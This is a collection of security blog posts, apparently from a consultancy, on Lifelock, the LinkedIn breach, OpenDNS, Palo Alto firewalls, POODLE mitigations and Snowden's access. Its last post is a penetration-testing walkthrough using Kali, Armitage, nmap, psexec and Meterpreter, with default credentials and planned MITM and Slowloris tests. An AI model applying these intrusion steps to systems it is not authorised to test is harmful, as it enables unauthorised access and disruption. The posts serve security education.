Lifelock Alerts – You've Been Hacked or a Social Site Was… Where's the Proof, Lifelock?

Recently an alert from Lifelock made me aware that my personal email account was somewhere on the black market. OK, I can see how that can happen when LinkedIn dropped the ball on security. The alert was attributed to the LinkedIn hack from back in 2012, and the spoils of that hacking resurfaced in May 2016.


In May 2016, LinkedIn had 164 million email addresses and passwords exposed. Originally hacked in 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly cracked in the days following the release of the data.

Compromised data: Email addresses, Passwords
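Why unsalted SHA-1 falls so fast is easy to demonstrate in a few lines of Python. The passwords below are invented; the point is that, without a salt, every account sharing a password shares a hash:

```python
import hashlib

def sha1_hex(password):
    """Unsalted SHA-1, as the leaked LinkedIn passwords were stored."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()

def sha1_salted(password, salt):
    """The same hash with a per-user salt prepended."""
    return hashlib.sha1((salt + password).encode("utf-8")).hexdigest()

# Unsalted: two users with the same password store the *same* hash, so one
# lookup in a precomputed table cracks every account using that password.
print(sha1_hex("linkedin123") == sha1_hex("linkedin123"))  # True

# Salted: identical passwords yield different hashes, defeating shared tables.
print(sha1_salted("linkedin123", "a1") == sha1_salted("linkedin123", "b2"))  # False
```

That is why the "vast majority" of 164 million hashes were cracked within days: crackers only had to attack unique hashes, not unique accounts.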

The website haveibeenpwned.com has recorded the hacks and is a great source to use. The reason I point you to that site is a call to Lifelock that didn't go the way I wanted it to. First off, I wanted to know which site out there has my information that they were able to scour and find.

Lifelock operator: "I'm sorry sir, we don't have that information in the alert. I can only see what you see. I do know that they scan 10,000 sites for this information."

Yes, OK, great. Now please go get your supervisor.

Supervisor: "Sir, yes, it's true this happened, and we urge you to change your password and maybe even your email account altogether."

OK, Ms. Supervisor, but where did you get that information? I work in security, and I work with ones and zeroes. Apparently, I can't get away from the zeroes. If the site exists, you must have a record somewhere of where my email address and old password are located. All Ms. Supervisor could do was restate the obvious: they didn't have the information. How about your IT department, I asked, can they help us out? Nothing.

So later on, doing something else, I hop over to the Netherlands and try to get some email, and wouldn't you know it, a Google alert says, "Hey, someone tried logging in with your account." I'm like, yes, me. The next day Lifelock gets the same thing, and an alert is sent to my cell. OK, so this is how Lifelock works: working with Google to find out when someone attempted to use my account. Not impressing me.

Lifelock is basically selling cyber insurance and is not providing the details of where it found my information. This post is a challenge to think about what exactly we are getting from this service that we can't get from news sources on the web about breaches. Where is the proof, Lifelock? That is my challenge to you. Don't call me up and tell me something is out there… we all know that.

While you're browsing the web, here is a nice, recent article about identity-protection services not being all they're cracked up to be: "Why Identity-Theft Protection Isn't All It's Cracked Up To Be" by Kaveh Waddell.

An even better eyebrow-raiser: "Despite Promises, Lifelock Knows Public Data Is a Risk." Guess I'm not the only one calling Lifelock out in the street.

Too Siloed to React, Now Respond.

Ever think about what would happen if you got hacked? Maybe you are wondering if the IPS guys or the HIPS guys are really doing their jobs. In corporate America it is real easy to overlook a lot of precautions and security because you're just too leveraged. Today's threats are evolving as bad actors continue to find ways inside. They exploit social sites and technology, and the human frailty of wanting to be needed, and work their way through with advanced IPS, IDS, and anti-X evasion techniques. So what are you to do?

When you look at the problem from your cube, doing your work on your piece of the asset, your mind tends to think, "OK, this is what I have to do," and you move on to the next asset and service on that asset. That is all you can touch. Your ethical hacking group is looking too busy (or not busy enough) to assist, and maybe they can or cannot really find all the holes in your security posture. How about a resident hacker, dedicated to that client or to your span of control of clients, who checks security by reviewing the vulnerability reports made with hacking tools? The key difference here is not to pay for a once-a-year penetration test but to test regularly: red team vs. blue team, with results provided to management. Even just testing monthly to make sure patches and firewall rules are in place would be great. I think this would be one of the best security practices a company could get into.

RedSeal is a software solution that provides visibility into an organization's security by analyzing configurations and building out the network diagram. It can then import vulnerability reports and host information to really give you the what-if scenario you have been thinking about in your cube. It will also give you a list of objectives to test, so you can confirm which of the holes found are real and need to be fixed.
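The monthly patch-and-firewall check described above can start as simply as diffing a scan against an approved baseline. A sketch, where the host names, baseline, and scan results are all invented:

```python
# Hypothetical baseline audit: host names, approved ports, and scan results
# are all invented. The point is the practice of regularly diffing reality
# against policy, not any particular tool.
APPROVED = {
    "web01": {80, 443},
    "db01": {5432},
}

def audit(scan_results):
    """Report ports that drifted from the approved baseline, per host."""
    findings = {}
    for host, open_ports in scan_results.items():
        allowed = APPROVED.get(host, set())
        unexpected = open_ports - allowed  # holes the firewall should close
        missing = allowed - open_ports     # services that should be up but are not
        if unexpected or missing:
            findings[host] = {"unexpected": unexpected, "missing": missing}
    return findings

# Here db01 has telnet (23) open that the baseline forbids:
print(audit({"web01": {80, 443}, "db01": {23, 5432}}))
```

Run on a schedule and reported to management, even something this small catches firewall-rule drift between the annual pen tests.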

Security is not something you buy or do once in a while. It's a practice built on defined policies and procedures that are executed over and over again. If you think you are failing to practice the right procedures every day, or that your vigilance is intermittent, then you are a good candidate for Building Security into Everyday Operations 101. Yes, a bit wordy, but think about it: it's not rocket science. The hurdles are time, the silo, and recognizing the concept.

In conclusion, the best security is a resident security expert who is allowed to do their job and given the right tools and processes. If you cannot get a resident hacker or spend time on this yourself, allow me to make some suggestions: get a requisition opened with HR to fill this role, or hire a service from a firm that understands vulnerability assessments and penetration testing. Let them test regularly and provide results to you, and maybe you can stay out of the news. Security awareness and training also help prevent attacks, because users bring the risk in through their computers. The biggest ways in are Adobe Flash and Reader, Java, and spear phishing.

If you have any questions or comments, or are looking for advice on services and where to go, feel free to contact me.

OpenDNS – Use It!


I cannot say it enough. Wherever I go, and whenever I can, I advocate using OpenDNS. They screen URLs before you reach them, so you are far less likely to hit a bad site. Defense in depth is addressed here as well: you need to watch your perimeter as well as the deep inside, where your users reside. In fact, most hacking events today involve end users. What do they do all day? Work, and when they get a chance to blow off steam or check personal email, they open you up to risk. This means all the end users open your company up to attack via data leakage, IP losses, and corporate espionage. What's funny: when companies buy other companies, they inherit the risk associated with those systems. Has anyone ever really thought about the risk inherited by hiring you, the employee? Maybe the board will start to rethink M&A and apply it to the microcosm in the workplace.

Recently SANS NewsBites ran an item about OpenDNS and detecting suspicious domains.

–Detecting Suspicious Domains
(March 5, 2015)
Technology being developed by OpenDNS aims to hasten detection of malicious websites and domains. The technology, called Natural Language Processing Rank (NLPRank), checks for suspicious site names. To reduce the incidence of false positives, it also checks to see if the domain is running on the same network that the organization it claims to be from actually uses.
[Editor's Note (Northcutt): OpenDNS is a really cool operation and if you are not using it for your home network you should really consider it; this goes double if you are a parent. And NLPRANK is an idea whose time has come. The idea of registering domain names that are similar to valid and trustworthy names e.g. is not new. What is fairly new is the ability of attackers to prepare an attack, register these slightly-off domains, embed them in tiny urls, phishing links in emails, etc., and mop up the opportunities the people that succumb to the attack present them in a very short period of time. In manufacturing and quality control, people are very sensitive to cycle time. We need to apply that type of mindset in defensive cybersecurity.]

The article comments on the capability of NLPRank, a natural-language-processing rating system in which, for example, a domain name that was registered recently, is deliberately misspelled, and/or has bad registrant email information is given a negative rank. Such a domain would be blocked for users of OpenDNS, or flagged with a warning showing it's risky, much like WOT did with its color scheme for website search results. The system was still in testing at the time of this writing but should be usable in the near future. Hats off to OpenDNS for continuing to shock and wow the world and give people and businesses an edge in thwarting cyber criminals.
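To get a feel for the lookalike-name idea behind NLPRank, here is a toy sketch that flags domains suspiciously close to trusted names using plain string similarity. This is not OpenDNS's actual algorithm (which, as described above, also weighs registration data and the hosting network); the trusted list and threshold are assumptions:

```python
from difflib import SequenceMatcher

# Toy version of typosquat detection. NOT OpenDNS's algorithm; the trusted
# list and the 0.85 similarity threshold are invented for illustration.
TRUSTED = ["paypal.com", "linkedin.com", "google.com"]

def lookalike_score(domain):
    """Return the trusted domain this name most resembles, and how closely."""
    best = max(TRUSTED, key=lambda t: SequenceMatcher(None, domain, t).ratio())
    return best, SequenceMatcher(None, domain, best).ratio()

def is_suspicious(domain, threshold=0.85):
    trusted, score = lookalike_score(domain)
    # Very similar to a trusted name, but not an exact match: likely typosquatting.
    return score >= threshold and domain != trusted

print(is_suspicious("paypa1.com"))    # True: one character off paypal.com
print(is_suspicious("linkedin.com"))  # False: exact match to a trusted name
```

A real system would pair this with the registration-age and hosting-network checks the SANS item describes, precisely to cut the false positives a similarity score alone would generate.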

Sentrix – Defending Your Web Presence


What is Sentrix? Sentrix is a company that provides defense for your web presence on their hardware, not yours. This includes protecting the database backend by hardening the front end. In addition, they provide DoS, DDoS, and web application protection. I am sure I am missing a few others, but you get the point. What really makes me think this company has a sound cloud-based solution is that it is context-aware. This is akin to being application-aware, as with Palo Alto firewalls.

Sentrix reviews the site and, based on the context, builds a replica of it. Proofs of concept can be built in 24 hours for testing, with no impact to production servers. It's really worth taking it for a test drive and watching how this works. That leads us to the next topic: how it works. When Sentrix scans and reviews your site, it sorts the site's presentation and functionality into two categories: one bucket is called the presentation bucket, and the other is called the business transaction bucket. It also builds whitelist rules that allow some transactions, like username/password authentication, to go back to the original server (your server). Everything else stays right there on the replica.

When a site is built, you have access to a dashboard where you can start working on your field validation, defining what characters and actions are allowed in each field. Each replica automatically provides rules for you to start with, because it is context-aware. From here you can edit them, as well as network settings. You can also use human-validation measures like CAPTCHA to help ensure people, not scripts or bots, are viewing.
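The per-field whitelist idea is worth a quick sketch. The rules below are hypothetical; real Sentrix rules are generated from the site's context and edited in its dashboard:

```python
import re

# Hypothetical per-field whitelist rules, for illustration only. The idea:
# each form field accepts only a defined pattern, so injection payloads
# never reach the backend.
FIELD_RULES = {
    "username": re.compile(r"^[A-Za-z0-9_.-]{3,32}$"),
    "zip_code": re.compile(r"^\d{5}(-\d{4})?$"),
    "comment":  re.compile(r"^[\w\s.,!?'-]{0,500}$"),
}

def validate(field, value):
    """Accept a value only if its field has a rule and the value matches it."""
    rule = FIELD_RULES.get(field)
    return bool(rule and rule.fullmatch(value))

print(validate("zip_code", "12345"))                     # True
print(validate("comment", "<script>alert(1)</script>"))  # False: < and > not allowed
```

Note the default-deny stance: a field with no rule rejects everything, which is the safe failure mode for a whitelist.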

DoS and DDoS protection is done by creating rules that queue connections if their rate increases rapidly. Sentrix will also spin up more gateways as needed to service the connection load. Alternatively, you can simply deny connections above a certain rate to ensure that your site stays up. So yes: web application attacks, application-layer DoS, and other threats can be mitigated with Sentrix. I am very impressed with the technology. Now they just need some Super Bowl commercials and I think everyone will get the message.
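The "queue or deny connections over a certain rate" idea can be sketched as a sliding-window rate limiter. The limits and data structure here are assumptions, not Sentrix's implementation:

```python
import time
from collections import deque

# Illustrative sliding-window rate limiter; limits are invented.
class RateLimiter:
    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.hits = {}  # client ip -> deque of request timestamps

    def allow(self, client_ip, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits.setdefault(client_ip, deque())
        while q and now - q[0] > self.window:
            q.popleft()  # drop timestamps that fell out of the sliding window
        if len(q) >= self.max_requests:
            return False  # over the rate: queue or deny this connection
        q.append(now)
        return True

limiter = RateLimiter(max_requests=3, window_seconds=1.0)
print([limiter.allow("203.0.113.9", now=t) for t in (0.0, 0.1, 0.2, 0.3)])
# First three connections pass; the fourth, inside the same second, is denied.
```

Per-client tracking is what lets legitimate traffic keep flowing while one flooding source gets throttled.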

Why Use a Cloud When You Can Build Your Own: ownCloud and BTSync Backup Server

Anyone wishing to retain rights and privacy to their information without relying on cloud services like Google, iCloud, or even Western Digital's My Cloud: look no further. Netwerk Guardian LLC can install your own ownCloud and BTSync server just for you. Small businesses are already enjoying backups over encrypted TCP or UDP with BTSync, which has been around for almost two years. We have the technology here for you, so you can back up your data and content your way and share it with whomever you want to see it.

  • ownCloud is free; we just install it for you and set you up.
  • BTSync is free.
  • Bring your own hardware, or we will provide it for you (best option: purpose-built).
  • You are now free! Come join a million strong as we take back privacy over our data. We install, educate, and, if you want, we can manage it or teach you how.



    POODLE – What to do about it (CVE-2014-3566)

    POODLE (CVE-2014-3566) is a vulnerability in which negotiations between client and server fall back to a lower-security protocol (from TLS 1.0 to SSLv3), whose predictable padding enables an oracle-based side-channel attack. An attacker in a man-in-the-middle position can use it to recover ciphertext contents such as session IDs and decrypt them, which opens the possibility of hijacking sessions when users go off corporate security infrastructure to other sites. Some published workarounds amount to staying on legacy SSL; I would suggest the opposite: use TLS 1.1 or 1.2. Have users work from within the corporate network, go to safe sites, and NOT use hotspots and open Wi-Fi connections for business-related activities. A lot of platforms, like Java, ASP.NET, Ruby on Rails, C++, Python, Perl, PHP, and ColdFusion, are targets for this padding side-channel attack. Forcing 24×7 VPN connections and forcing users through the corporate security infrastructure may also help protect corporate assets. End users should not use corporate computers for personal use until this is resolved. There are settings in browsers and on Windows computers to force TLS 1.0 or higher; see the settings found here: news-19775.html
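Server- and client-side code can enforce the same floor. For example, with Python's modern ssl API (an API newer than this post), refusing the SSLv3 fallback that POODLE depends on takes two lines:

```python
import ssl

# A client context that refuses SSLv3 and early TLS, matching the advice
# above to require TLS 1.1+ (TLS 1.2 shown here).
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.minimum_version = ssl.TLSVersion.TLSv1_2  # nothing older will negotiate

# Any socket wrapped with this context fails the handshake rather than
# accept a downgrade to SSLv3, which is exactly what the POODLE MITM needs.
```

The same policy belongs on the server side, so a downgrade cannot be forced from either end of the connection.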

    Check your browsers here

    Browser Fixes
    Mozilla Firefox

    Type about:config into the address bar and hit Enter or Return. Click “I’ll be careful, I promise!” in the resulting warning window. Scroll down the list of preferences and double-click “security.tls.version.min”. Change the integer from 0 to 1 and click OK.

    Google Chrome

    For Google Chrome, you’ll have to temporarily become a power user and use a command line. The instructions are a bit different for Windows, Mac and Linux.

    In Windows, first close any running copy of Chrome. Find the desktop shortcut you normally click to launch Chrome and right-click it. Scroll down to and click Properties. Click the Shortcut tab. In the Target field, which should end with "\chrome.exe", add a space, then add this: --ssl-version-min=tls1 (no quotation marks). Click Apply and then OK.

    Microsoft Internet Explorer

    Click the Tools icon in the top right corner (the icon looks like a gear). Scroll down and click Internet Options. In the resulting pop-up window, select the Advanced tab, then scroll through the list of settings until you reach the Security category. Uncheck Use SSL 3.0, click Apply, and then click OK.

    Diving Deeper

    Leaking information through padding, as the wiki describes, is the norm when plaintext is padded to match the underlying cipher's block size; this is the case for the ECB and CBC modes used in block ciphers. Attackers can decrypt, and even forge, messages protected by the server's keys without ever knowing the keys themselves. The issue is the predictable padding and initialization vectors being implicit instead of explicit. While the usual server-side fix is to upgrade OpenSSL, I would move to something stronger and force clients to do the same. If we do not push for better security now, then when? Yes, there will be some pains in the transition, but I believe if we fend off the attackers at the perimeter and on the users inside, we will all be better off. Only around 18% of web servers use TLS 1.2, according to Qualys. Qualys further notes that moving up to TLS 1.1 or 1.2 doesn't mean the BEAST attack is thwarted, only that any remaining attack vector is not yet known.
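The "predictable padding" problem is concrete enough to show in code. This is a simplified sketch, not the full SSLv3 record format: in SSLv3's CBC padding, only the final byte (the pad length) means anything, and the padding bytes themselves are never checked, which is the one-bit oracle POODLE exploits:

```python
# Simplified sketch of why SSLv3's CBC padding creates an oracle.
# Block layouts below are illustrative, not full SSLv3 records.
def sslv3_padding_ok(plaintext_block, block_size=16):
    pad_len = plaintext_block[-1]
    return pad_len < block_size  # nothing else is verified: junk bytes pass

# TLS-style padding, by contrast, requires every pad byte to equal pad_len:
def tls_padding_ok(plaintext_block):
    pad_len = plaintext_block[-1]
    return all(b == pad_len for b in plaintext_block[-(pad_len + 1):])

block = b"\x00" * 15 + b"\x0f"  # 15 arbitrary bytes, then the length byte
print(sslv3_padding_ok(block))  # True: SSLv3 accepts it, leaking one bit
print(tls_padding_ok(block))    # False: TLS rejects the junk padding
```

By moving bytes around and watching which modified records the server accepts, a MITM attacker turns that accepted/rejected signal into recovered plaintext, one byte at a time.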

    Palo Alto Firewalls – There is Nothing Else Left to Compete


    I just finished taking the PAN 201 and 205 classes. Had I known two years ago that these firewalls can do all that they do, I would have trained earlier. Where else can you get a firewall that inspects traffic in real time with a single-pass technology (Single Pass Parallel Processing) and reviews packets in up to five ways with App-ID before deciding what to do with them (worst case)? And that is just App-ID. There is still Content-ID and User-ID for policing traffic into and out of your network. Remember, security is everyone's job, and watching what leaves your organization is just as important. You don't want to be part of a botnet. You don't want your secret sauce leaving, either.

    App-ID Inspection
    Traffic is first classified by IP and port. Next, signatures are applied to the allowed traffic (that's two). Third, if App-ID determines that SSL or SSH encryption is in use, a decryption policy can be applied (if legally allowed). The fourth inspection uses known protocol decoders to apply additional context-based signatures and see if applications are tunneling other traffic inside. This helps catch salami attacks and data diddling; when data leaves in small chunks back to command and control, these known decoders help very well. When that does not work, heuristics are used to check whether the packets' behavior is normal before the traffic passes.
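The layered decision process above can be sketched conceptually. Everything here (packet fields, signatures, stage logic) is invented for illustration; it is not Palo Alto's implementation, just the shape of the idea that each stage can refine or override the previous one:

```python
# Conceptual sketch of layered classification in the spirit of App-ID.
def classify(packet):
    # 1. Port/IP-based first guess.
    if packet["port"] == 443:
        guess = "ssl"
    elif packet["port"] == 80:
        guess = "web-browsing"
    else:
        guess = "unknown"
    # 2. Application signatures refine (and can override) the port guess.
    if b"BitTorrent protocol" in packet["payload"]:
        return "bittorrent"
    # 3. If encrypted and a decryption policy applies, inspect the inner payload.
    if guess == "ssl" and packet.get("decrypted_payload"):
        packet = {**packet, "payload": packet["decrypted_payload"]}
    # 4. Protocol decoders catch apps tunneling inside an allowed protocol.
    if packet["payload"].startswith(b"SSH-2.0"):
        return "ssh"
    # 5. Fall back to the heuristic/port-based guess.
    return guess

print(classify({"port": 80, "payload": b"BitTorrent protocol..."}))  # bittorrent
print(classify({"port": 22, "payload": b"SSH-2.0-OpenSSH_8.9"}))     # ssh
```

The key property is in stage 2: a signature match beats the port number, which is exactly why "port 80, so it must be web browsing" no longer flies.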

    There are three paths traffic can take while being analyzed: firewall session setup (the slow path), the firewall fast path, or application identification. The firewall can decrypt SSL and SSH traffic (excluding legally protected traffic such as HIPAA or banking/financial data) to determine whether the content inside is legitimate, then drop it or re-encrypt it and send it on to its destination. The firewall also offers a subscription-based service, WildFire, for malware and threat protection and analysis: hands-free administration right there, folks. BrightCloud provides the URL filtering service; WildFire provides threat protection and sandboxing, with file uploads for review up to 10 MB. There is so much to say about this firewall. It even has packet-capture capability right on a policy or filter, to aid in troubleshooting connectivity or an incident. No more running out to the data center floor or waiting for an approved change. App-ID checks applications and verifies that they behave as they should: no more open ports letting traffic just ride on in. It will lay the smackdown on any traffic not adhering to signature or behavioral patterns. Does your Cisco or Check Point do that? Really? How well? What buffer? Did you say lag to analyze your traffic? Sorry to hear that. Palo Alto appliances have dedicated hardware (a multi-core security processor, a network processor, and a signature-match processor) to do all that security.

    The control plane works with, and independently of, the data plane. Reboot one, the other, or both. Keep visibility while rebooting, or let the traffic run and reboot only the management plane. No more waiting for off-hours to make changes. There are 15 steps in the flow logic that all traffic may go through.

    Heck, we haven't even touched GlobalProtect (VPN), which can extend the corporate border anywhere and provide more protection. Think about security and what you would like to do. You want to be safe, to see an incident when it happens, right? And to guard against future incidents? This is the firewall for you. I have worked with many firewalls: Check Point (my old favorite), Juniper, and Cisco ASA (I tested and passed). Nothing compares to Palo Alto. If I were the other vendors, I'd start looking for another job.

    More to come on this story. Check it out for yourselves. Palo Alto Networks

    For a good start on how this technology works, take a look at this excerpt from Palo Alto:

    © 2013 Palo Alto Networks

    Executive Summary: The Need for a Single-Pass Architecture

    For many years, the goal of integrating threat prevention services into the firewall has been pursued as a means of alleviating the need for additional devices for functions such as IPS, network antivirus, and more. The pursuit of integrating threat prevention functions into the firewall makes perfect sense – the firewall is the cornerstone of the security infrastructure.

    Current integration iterations carry a variety of different labels – deep inspection, unified threat management (UTM), deep packet inspection, and others. Each of these iterations share a common problem, which is a lack of consistent and predictable performance when security services are enabled. Specifically, the firewall functions are capable of performing at high throughput and low latency, but when the added security functions are enabled, performance decreased while latency increased.

    The Palo Alto Networks Single-Pass Parallel Processing (SP3) architecture addresses the integration and performance challenges with a unique single-pass approach to packet processing that is tightly integrated with a purpose-built hardware platform.

    Single-pass software: By performing operations once per packet, the single-pass software eliminates many redundant functions that plague previous integration attempts. As packets are processed, networking, policy lookup, application identification and decoding, and signature matching for any and all threats and content is only performed once. This significantly reduces the amount of processing overhead required to perform multiple functions in one security device. The single-pass software uses a stream-based, uniform signature matching engine for content inspection. Instead of using separate engines and signature sets (requiring multi-pass scanning) and instead of using file proxies (requiring file download prior to scanning), the single-pass architecture scans traffic for all signatures once and in a stream-based fashion to avoid the introduction of latency.

    Parallel processing hardware: The single-pass software is then integrated with a purpose-built platform that uses dedicated processors and memory for the four key areas of networking, security, content scanning and management. The computing power within each platform has been specifically chosen to perform the processing-intensive task of full stack inspection at multi-Gbps throughput. The resulting combination delivers the horsepower required to achieve consistent and predictable performance at up to 20 Gbps of throughput, making the goal of integrated firewall and threat prevention a reality.

    Snowden Picking Info Off the NSA Network – What Went Wrong

    As agreed, I'll revisit this article from Computerworld.

    The story is just screaming about some basic, fundamental, but glaring omissions in security practice. The CISSP study material addresses least-privilege roles and mandatory and discretionary controls by lesson 3, if not at the very beginning. Where is the payoff of hiring someone with a CISSP to work for the NSA if the organization failed to demonstrate this practice? Why is it that we can see when people access certain shares, and yet the big machine cannot?

    The documents were kept in the portal so that NSA analysts and other officials could read and discuss them online, NSA CTO Lonny Anderson told National Public Radio in an interview Wednesday.

    As a contracted NSA systems administrator with top-secret Sensitive Compartmented Information (SCI) clearance, Snowden could access the intranet site and move especially sensitive documents to a more secure location without raising red flags, Anderson said.

    Thus, Snowden could steal the NSA Power Point slides, secret court orders and classified agency reports that he leaked to the media. “The assignment was the perfect cover for someone who wanted to leak documents,” Anderson told NPR.

    “His job was to do what he did. He wasn’t a ghost. He wasn’t that clever. He did his job,” Anderson said.

    That above-mentioned quote should get a knee slap at happy hour for being duped by Snowden. While he wasn't "clever" enough to hack in and get the loot, Mr. Anderson, he was clever enough to do it and leave before you stopped him. He went right in the front door and did it under your nose. You'd be wise to allow only the people with a need to know to perform the technical work, with the same controls mentioned below on tagging, which amounts to enabling an audit trail.

    The NSA has also started "tagging" sensitive data and documents to ensure that only people with a need to see a document can access it. The document tagging rule also lets security auditors see how individuals with legitimate access to the data are actually using it, Anderson said.

    This leads the general public to believe that they are using some Windows file-share system and not a content-delivery system with an audit trail designed in from the start. This brings me back to my pharmaceutical days, when a vendor, Agilent, made a document system where one could look up research based on metadata. The NSA could learn a lesson here.

    The following excerpt of the article, a response from Eric Chiu, is one I disagree with. While role-based security is nice for the group, let's look at the individual. As stated by Mr. Chiu:

    “Companies need to shift their thinking from an outside-in model of security to an inside out approach,” said Eric Chiu, founder of Hytrust, a cloud infrastructure management company.

    “Only by implementing strong access controls [like] the recent NSA ‘two-man’ rule as well as role-based monitoring, can you secure critical systems and data against these threats and prevent breaches as well as data center failures,” he said.

    Where is the detailed log of the individual user? In discretionary access control, the user can make policy decisions, contrary to mandatory access control. From the wiki, for quick reference:

    With mandatory access control, this security policy is centrally controlled by a security policy administrator; users do not have the ability to override the policy and, for example, grant access to files that would otherwise be restricted. By contrast, discretionary access control (DAC), which also governs the ability of subjects to access objects, allows users the ability to make policy decisions and/or assign security attributes. (The traditional Unix system of users, groups, and read-write-execute permissions is an example of DAC.) MAC-enabled systems allow policy administrators to implement organization-wide security policies. Unlike with DAC, users cannot override or modify this policy, either accidentally or intentionally. This allows security administrators to define a central policy that is guaranteed (in principle) to be enforced for all users.

    I believe the correct solution would be a lattice-based access control implementation, where the user can only access data if their security designation dominates the target's, AND there is user-level logging while in the system.
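That combination is easy to sketch. A minimal lattice check: a subject may read an object only if the subject's clearance level is at least the object's AND the subject holds every compartment on the object, with every individual attempt logged. The users, compartment labels, and document names below are invented for illustration:

```python
# Toy lattice-based access control with per-user audit logging.
# Labels, users, and documents are invented for illustration.
LEVELS = {"UNCLASSIFIED": 0, "SECRET": 1, "TOP SECRET": 2}

def dominates(subject, obj):
    """Lattice dominance: level is high enough AND compartments are a superset."""
    s_level, s_comps = subject
    o_level, o_comps = obj
    return LEVELS[s_level] >= LEVELS[o_level] and s_comps >= o_comps

audit_trail = []  # every individual access attempt is recorded

def read(user, subject, doc, obj):
    allowed = dominates(subject, obj)
    audit_trail.append((user, doc, allowed))  # the per-user log Chiu's model lacks
    return allowed

admin = ("TOP SECRET", {"SCI"})             # clearance, but missing a compartment
slides = ("TOP SECRET", {"SCI", "NOFORN"})  # object requires both compartments
print(read("sysadmin1", admin, "slides.ppt", slides))  # False: missing NOFORN
```

Note that a top-secret clearance alone is not enough: the compartment check is what blocks a sysadmin from documents outside his need to know, and the audit trail is what shows an auditor that he tried.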

    Now, taking this story down the rabbit hole: what makes you think the glasses-wearing Snowden didn't go in, read the documentation, and record it with super spy glasses? How about a cell phone camera? How about a phone call with him reading the information verbatim right off the screen? These are also fundamental physical breaches that may or may not be considered, as this can be done in plain sight. Why was he accessing so many files? Why wasn't the six-month security access check picking up on his behavior? Why isn't the NSA watching its own people more closely than it is watching us? How come Israeli airport screeners can detect malicious people by watching and interviewing them, the old-fashioned way, with no mechanical screening?

    Penetration Testing with Linux – Featuring Kali and Armitage

    Netwerk Guardian LLC brings you this piece showing what can be done in penetration testing with Kali or Backtrack and Armitage. This is a technical subset of my thesis on effective penetration testing. So without further delay…

    Penetration testing with Linux is one of the best ways to perform tests; it is a versatile tool. Linux comes in many flavors, like Backtrack 5 RC3 or, now, Kali. Linux allows for customization of the software itself plus the tools that you use; therefore, the customization and level of sophistication are limitless. This article covers using Backtrack 5 RC3 and Armitage for the test as it was executed during the pen test, and it may not cover all features of Armitage. However, in order to give you a better understanding of Armitage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack following the release of Kali in early 2013. We chose to use Kali in this article to show you something recent, but the other versions of Linux are still very good tools to use in the field.

    Backtrack comes loaded with Metasploit, and, as you know, in order to find and run an exploit there you have to switch to its directory and run the commands specific to it. This is no longer the case with Kali: following the FHS (Filesystem Hierarchy Standard), Kali makes all commands accessible system-wide from the command line. Armitage provides a nice GUI for Metasploit. It also has a dashboard you can use for setting up the hosts or network you are going to target. You can import hosts from files associated with other network security assessment tools, like Nessus, IP360, and Burp session XML; Armitage imports anything from a text or XML file. You can use some of the automation presented with Armitage. In addition, it is wise to customize these scripts when delivering a penetration test; you never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks from which you can draw in your test. This helps save time and keeps you focused, but not all exploits work, as targets can be hardened. Customizing scripts and Linux itself has long been the core of these releases. Armitage can be used as a standalone tool as well as a networked solution when working with other pen testers. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format, though not in an all-inclusive report format; this store, called loot, is where the results go.

    Armitage is launched by navigating the Applications menu: Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In a new installation of Kali, you will have to manually type the following commands in order for Armitage to connect to the database: service postgresql start and service metasploit start. Once these are entered, you can start Armitage successfully using the default install username msf and password test.
    Image 1

    Next, there is a series of prompts that direct you through launching and customizing port usage. Once Armitage is open, we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with one of several scripted choices. The rules are the same for using nmap in Armitage as on its own: there are aggressive scans and quieter scans, so choose wisely in order to remain quiet. The machines we want to target are a server hosting the core business application and a typical user workstation. See Image 3 below, from the pen test previously run with Armitage on Backtrack 5 RC3.

    Image 2 (Launching nmap within Armitage)
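Under the hood, the simplest thing nmap can do is a TCP connect scan, which is worth seeing stripped to its essentials. A bare-bones Python equivalent (the host and ports in the example call are placeholders), with none of nmap's timing, stealth, or service-detection features:

```python
import socket

# Minimal TCP connect scan: the same idea as nmap's -sT option, reduced to
# its core. Hosts and ports in the example are placeholders.
def scan_host(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the handshake completed
                open_ports.append(port)
    return open_ports

# e.g. scan_host("10.0.0.5", [22, 80, 443, 445])
```

Because each probe completes a full handshake the target can log, connect scans are the loud option; that is exactly why the aggressive-versus-quiet choice in Armitage matters.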

    The next step is the find-vulnerabilities scan. Armitage scans the hosts out there and comes up with a proposed list of attacks. Not each and every attack is going to work; Armitage identifies a type of technology to exploit, and this, coupled with your experience and training, lets you judge whether an attack may or may not be successful. This is where the pen tester needs to be on their best game to find an exploit with which to launch a payload. What is good about Armitage is that each exploit or payload you try opens a new tab, so you can see what works, what doesn't, and where to go next.
    Now that we have our hosts found and targeted and an attack list in hand, we can proceed. Since the machines were Windows based, we went straight to the Windows exploits to see if there was a way to pwn the boxes. In Armitage you can assign login credentials to each host, which are then used to run the payloads. We tried many exploits but found that only one really worked; it will be addressed later. Below in Image 3 you can see that when a system username and password are known and Login > psexec is used, lightning appears all around the host.

    Image 3 (Note the lightning around Hosts = pwned)

    In the pen test shown here, the machines' administrator accounts were known; this was a white box test to see if we could sniff traffic from the core business application. The objective was to imitate an insider threat, and to demonstrate something beyond passing the hash of Windows users on the network.
    The following outlines what we want to test. This is taken from a lab setup of a typical company running an earth materials management system. The network is made up of Microsoft Windows machines, with Windows 7 for end users and Windows Server 2008 R2 as the server. The objective is to look for vulnerabilities on the host machines and see if we can capture data crossing the network between the hosts and the server, as for corporate espionage.
    1. Test Core Business Application
    a. Test core business application against
    i. Clear text traffic capturing
    ii. Man in the middle (MITM)
    iii. Spoofing
    iv. Armitage w/Meterpreter
    v. DoS Slowloris

    Port Scanning Results and Issues
    Scanning Windows machines

